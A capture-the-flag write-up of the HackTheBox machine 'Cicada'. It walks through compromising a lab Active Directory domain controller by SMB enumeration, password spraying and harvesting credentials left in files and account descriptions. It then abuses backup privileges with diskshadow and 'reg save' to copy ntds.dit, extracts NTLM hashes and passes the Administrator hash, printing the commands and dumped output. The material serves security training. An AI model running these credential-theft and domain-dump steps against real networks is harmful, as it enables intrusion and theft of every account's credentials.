Cicada is an easy-difficulty HackTheBox machine that hosts a Windows Active Directory Domain Controller where initial access begins with unauthenticated SMB share enumeration to retrieve a corporate notice containing a default password. Performing RID brute-forcing identifies domain user accounts, and password spraying yields access as michael.wrightson. Querying Active Directory user attributes reveals plaintext credentials for david.orelious stored inside an account description. Authenticating as david.orelious provides read access to a development SMB share containing a PowerShell backup script, which discloses hardcoded WinRM credentials for emily.oscars. With an interactive WinRM session established as emily.oscars, inspecting user privileges confirms SeBackupPrivilege rights and membership in BUILTIN\Backup Operators. Full domain compromise is achieved by leveraging diskshadow to create a Volume Shadow Copy, extracting ntds.dit and the SYSTEM registry hive to decrypt the Domain Administrator NTLM hash offline, and authenticating via Pass-the-Hash.
1. Reconnaissance & Anonymous SMB Enumeration
1.1 Network Scanning & Port Service Discovery
As the first step, I ran an NMAP scan on the target machine to get a better idea of the target machine. I used nmap -sC -sV -O cicada.htb -oN nmap_scan to scan the open ports and services.
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-29 02:05 -0400 Nmap scan report for cicada.htb (10.129.231.149) Host is up (0.50s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-09-28 13:10:09Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-09-28T13:11:52+00:00; -16h55m56s from scanner time. | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:
Based on the results, the target machine is an Active Directory Domain Controller(CICADA-DC.cicada.htb).
The target machine exposes multiple services across multiple open ports.
- Port 53 - Running Simple DNS Plus.
- Ports 88 and 465 - Active Directory Kerberos authentication and password services.
- Ports 135 and 593 - RPC over HTTP
- Ports 389, 636, 3268 and 3269 - Active Directory LDAP Service
- Port 5985 - Microsoft HTTPAPI Service
1.2 Anonymous SMB Share Enumeration
Since the SMB service is exposed, I decided to enumerate it first. I was able to list some of the SMB shares anonymously without a password.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to cicada.htb failed (Error NT_SThe result revealed two non-standard shares: DEV and HR
1.3 HR Share Exfiltration & Default Password Recovery
I was able to connect to the HR share anonymously and list the contents. The List contained a file Notice from HR.txt.
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 476376 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)By downloading and inspecting the file, I was able to discover the welcome instructions intended for new hires. These instructions contained the default password for the new employee accounts.
Dear new hire! Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure. Your default password is: Cicada$M6Corpb*@Lp#nZp!8 ...
2. Credential Harvesting & Active Directory Discovery
2.1 RID Brute-Forcing & Domain User Enumeration
Since null authentication is permitted, next, I used netexec to enumerate RIDs from the target machine.
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest: ... SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
The result provided a list of usernames and group names on the target machine. Now I have a list of user accounts that I can try against the default password I found in the welcome message in the HR share.
2.2 Default Password Spraying
After extracting the usernames and creating the user.txt file, I used netexec again to spray the default password across all usernames.
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) SMB 10.129.231.149 445 CICADA-DC [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.129.231.149 445 CICADA-DC [-] CICADA\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] CICADA\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
The password worked for user michael.wrightson.
2.3 Domain User Description Enumeration
Even though michael.wrightson accepts the default password for SMB authentication, RDP is restricted, and the shell drops immediately.
Since I was unable to gain a foothold using michael.wrightson, I decided to enumerate SMB further using michael.wrightson credentials because authenticated results might reveal more information.
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.129.231.149 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description- SMB 10.129.231.149 445 CICADA-DC Administrator 2024-08-26 20:08:03 0 Built-in account for administering the computer/domain SMB 10.129.231.149 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain SMB 10.129.231.149 445 CICADA-DC krbtgt 2024-03-14 11:14:10 0 Key Distribution Center Service Account ... SMB 10.129.231.149 445 CICADA-DC david.orelious 2024-03-14 12:17:29 2 Just in case I forget my password is aRt$Lp#7t*VQ!3 SMB 10.129.231.149 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 2 SMB 10.129.231.149 445 CICADA-DC [*] Enumerated 8 local users: CICADA
The scan result reveals the password for user david.orelious.
3. Lateral Movement & Initial Access
3.1 DEV Share Enumeration & Credential Harvesting
Similar to michael.wrightson credentials, I couldn't gain a foothold on the machine using david.orelious credentials.
SMB share permission inspection revealed that david.orelious has read access to the DEV share.
SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:None) (Null Auth:True) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV READ SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share
After logging into the SMB share, I was able to find Backup_script.ps1, which contains the hardcoded password for the user emily.oscars.
$sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
3.2 WinRM Access & Initial Foothold
I was able to use emily.oscars credentials and log in to the target machine using evil-winrm and gain initial foothold and the user flag.
...
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/28/2026 6:04 AM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt4. Privilege Escalation via Volume Shadow Copy & NTDS Dumping
4.1 User Privilege Identification
After establishing the initial foothold, I decided to enumerate for emily.oscars user and group permissions to find a way to escalate privileges. Running whoami /all revealed the privileges and group memberships.
USER INFORMATION ---------------- User Name SID =================== ============================================= cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled.
Based on the output, emily.oscars is a member of the BUILTIN\Backup Operators group, and SeBackupPrivilege and SeRestorePrivilege privileges are enabled. These privileges allow bypassing standard file access control lists (ACLs) to perform file backups and restores.
This means even though emily.oscars is not an administrator, Windows trusts emily.oscars to perform backups and restores.
4.2 Volume Shadow Copy Creation
Because this machine is a Domain Controller, the C:\Windows\NTDS\ntds.dit file has the Active Directory database that contains user, NTML password hashes, domain information, etc.
But since emily.oscars is not an administrator, emily.oscars does not have permission to access the file using normal access controls. But as a backup operator, emily.oscars has to be able to back up the file without any restrictions.
Furthermore, since the C:\Windows\NTDS\ntds.dit file is locked by the Active Directory service processes during normal operations, a Shadow Copy needs to be created to capture a point-in-time snapshot of the complete C: drive.
After creating a staging directory C:\Temp, I created an instruction file inside the directory.
mkdir C:\Temp
$content = "set context persistent`r`nadd volume c: alias cicada`r`ncreate`r`nexpose %cicada% z:`r`n"
[System.IO.File]::WriteAllText(
"C:\Temp\shadow.txt",
$content,
[System.Text.Encoding]::ASCII
)The instructions file contains instructions for diskshadow.exe. It instructs diskshadow.exe to create a persistent snapshot of the C: drive and to expose it as a new drive Z:.
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: CICADA-DC, 9/28/2026 12:53:00 PM
-> set context persistent
-> add volume c: alias cicada
-> create
Alias cicada for shadow ID {74566dea-1c03-4018-a220-fb6a1fafd1b4} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {906a7979-4436-41af-8db0-a3438f8313f9} set as environment variable.
Querying all shadow copies with the shadow copy set ID {906a7979-4436-41af-8db0-a3438f8313f9}
* Shadow copy ID = {74566dea-1c03-4018-a220-fb6a1fafd1b4} %cicada%
- Shadow copy set: {906a7979-4436-41af-8db0-a3438f8313f9} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
- Creation time: 9/28/2026 12:53:26 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: CICADA-DC.cicada.htb
- Service machine: CICADA-DC.cicada.htb
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %cicada% z:
-> %cicada% = {74566dea-1c03-4018-a220-fb6a1fafd1b4}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\Temp> 4.3 Exfiltrating NTDS.dit and the SYSTEM Registry Hive
Once the Z: drive was exposed, I was able to copy the Z:\Windows\NTDS\ntds.dit file into my C:\Temp directory using robocopy backup mode to bypass ordinary file bypass checks.
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
Getting the ntds.dit file alone is not enough because password hashes are encrypted using the keys derived from the system registry. I was able to copy the registry hive into C:\Temp too.
reg save HKLM\SYSTEM C:\Temp\SYSTEM
After both files were copied into my C:\Temp directory, I was able to download both files into my Kali machine to extract the password hashes using impacket-secretsdump locally.
4.4 Hash Extraction & Pass-the-Hash Domain Compromise
After both files were downloaded successfully, I was able to use impacket-secretsdump to decrypt and extract NTLM hashes.
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ...
The dump contains the decrypted NTLM hash for Administrator. I was able to use this hash and log in as Administrator to the target machine using evil-winrm.
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txtCongrats! We found both flags!
HTB Machine Completion